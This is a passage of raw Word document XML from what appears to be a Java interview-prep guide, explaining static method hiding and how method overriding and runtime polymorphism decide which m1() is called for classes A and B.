          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: If a subclass defines a static method with the same signature as the parent class, it is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hidden</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, not overridden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BAA2C1" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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ile-Time Resolution</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Static methods are resolved at compile-time based on the class type, not the runtime type of the object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35185E93" w14:textId="67186660" w:rsidR="00195703" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0019570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58B9B317">
          <v:rect id="_x0000_i1392" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9D8200" w14:textId="77777777" w:rsidR="00D66479" w:rsidRPr="00CE4B95" w:rsidRDefault="00D66479">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="129" w:name="_Toc196307609"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>We have Class A and Class B which contains m1() method in both the class, and class B extends parent class A. Asked which method will get called on which object?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="129"/>
    </w:p>
    <w:p w14:paraId="7853874D" w14:textId="34C35898" w:rsidR="000A7726" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7726" w:rsidP="004266AA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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cenario: Class A and Class B with m1() Method, and Class B Extends Class A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377A8956"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Let's assume you have two classes, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Class A</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Class B</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, where </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Class B</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> extends </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Class A</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Both classes contain a method m1(). In this scenario, which method will be called depends on the object you're calling it on and whether m1() is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>overridden</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Class B.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F38586"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s a breakdown of how it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03566B5B" w14:textId="77777777" w:rsidR="000A7726" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7726" w:rsidP="004266A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If m1() is Overridden in Class B:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25613756"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Class B</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> overrides the m1() method from </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Class A</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, then the method of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>runtime type</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the actual object type) will be called, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not the reference type</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the declared class type). This is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>runtime polymorphism</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method overriding</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D949757" w14:textId="77777777" w:rsidR="000A7726" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7726" w:rsidP="004266A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687EA7D0"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A {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF8D424"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m1() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEF5367"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lass A: m1()");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515F6697"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3EF9655"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9670ECD" w14:textId="77777777" w:rsidR="000A7726" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7726" w:rsidP="004266AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71AF92BB"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B extends A {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779CFBFA"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5C7BA353"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m1() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E358A96"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lass B: m1()");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37125164"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4C94C4F"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9814A84" w14:textId="77777777" w:rsidR="000A7726" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7726" w:rsidP="004266AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00147F4D"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2D645C2E"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7E3114D2"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 obj1 = new A();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF8A809"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 obj2 = new B();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5342E7" w14:textId="77777777" w:rsidR="000A7726" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7726" w:rsidP="004266AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E3A6566"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obj1.m1();  // Calls m1() from Class A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7150A67C"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bj2.m1();  // Calls m1() from Class B (because of runtime polymorphism)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0FD83C"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0E752F0"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5656C32" w14:textId="77777777" w:rsidR="000A7726" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7726" w:rsidP="004266A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF49E0B" w14:textId="77777777" w:rsidR="000A7726" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7726" w:rsidP="004266AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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bj1 is an instance of A, so calling obj1.m1() calls the m1() method from </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Class A</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695FF62B" w14:textId="77777777" w:rsidR="000A7726" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7726" w:rsidP="004266AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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bj2 is a reference of type A, but it points to an object of type B. Therefore, calling obj2.m1() calls the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>overridden</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> m1() method in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Class B</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, because the actual object type is B and the method is overridden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2173B839" w14:textId="77777777" w:rsidR="000A7726" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7726" w:rsidP="004266A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p w14:paraId="6F6F2C0F"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A: m1()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FA34FC"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B: m1()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CF7301" w14:textId="77777777" w:rsidR="000A7726" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="004266A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53C49AC">
          <v:rect id="_x0000_i1393" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7B9D79" w14:textId="77777777" w:rsidR="000A7726" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7726" w:rsidP="004266A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If m1() is Not Overridden in Class B:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D54CF98"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Class B</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> does not override the m1() method, then the method from </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Class A</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will be called, even if the object is of type B, because the method is inherited from </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Class A</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39ACF39A" w14:textId="77777777" w:rsidR="000A7726" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7726" w:rsidP="004266A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3B0A3EAD"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A {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131343A0"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m1() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6515FD41"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lass A: m1()");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A1A64B"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F755281"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2EAEEBD" w14:textId="77777777" w:rsidR="000A7726" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7726" w:rsidP="004266AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49D59443"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B extends A {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A5B2BF"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No override of m1() in Class B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC70C25"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B29E193" w14:textId="77777777" w:rsidR="000A7726" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7726" w:rsidP="004266AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00BFA13E"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52997D05"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655E1D2E"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 obj1 = new A();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66925662"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 obj2 = new B();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1708E44A" w14:textId="77777777" w:rsidR="000A7726" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7726" w:rsidP="004266AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B2AB9EF"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bj1.m1();  // Calls m1() from Class A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412BD181"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bj2.m1();  // Calls m1() from Class A (because Class B doesn't override it)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491106DF"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D417E04"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48C3399" w14:textId="77777777" w:rsidR="000A7726" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7726" w:rsidP="004266A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A44DBF" w14:textId="77777777" w:rsidR="000A7726" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7726" w:rsidP="004266AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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bj1.m1() calls m1() from </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Class A</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, as obj1 is an instance of A.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27477812" w14:textId="77777777" w:rsidR="000A7726" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7726" w:rsidP="004266AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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bj2.m1() also calls m1() from </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Class A</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, even though the reference is of type A but the object is of type B. This is because </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Class B</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> doesn't override m1(), so the method from the parent class A is inherited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD622A7" w14:textId="77777777" w:rsidR="000A7726" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7726" w:rsidP="004266A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p w14:paraId="60FC51E2"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A: m1()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADE36A0" w14:textId="77777777" w:rsidR="000A7726" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7726" w:rsidP="004266A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A: m1()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E264B4" w14:textId="77777777" w:rsidR="000A7726" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="004266A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4E31D9C">
          <v:rect id="_x0000_i1394" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3E194C" w14:textId="77777777" w:rsidR="000A7726" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7726" w:rsidP="004266A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 of Which Method Gets Called:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225D2C2A" w14:textId="77777777" w:rsidR="000A7726" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7726" w:rsidP="004266AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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f m1() is overridden in Class B:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B73F988" w14:textId="77777777" w:rsidR="000A7726" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7726" w:rsidP="004266AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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method from the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>actual object type</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (i.e., the runtime type) will be called.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B38D209" w14:textId="77777777" w:rsidR="000A7726" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7726" w:rsidP="004266AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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Example: If obj2 is of type A but refers to an object of type B, the m1() method in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Class B</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will be called, even though the reference is of type A.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDE9862" w14:textId="77777777" w:rsidR="000A7726" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7726" w:rsidP="004266AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
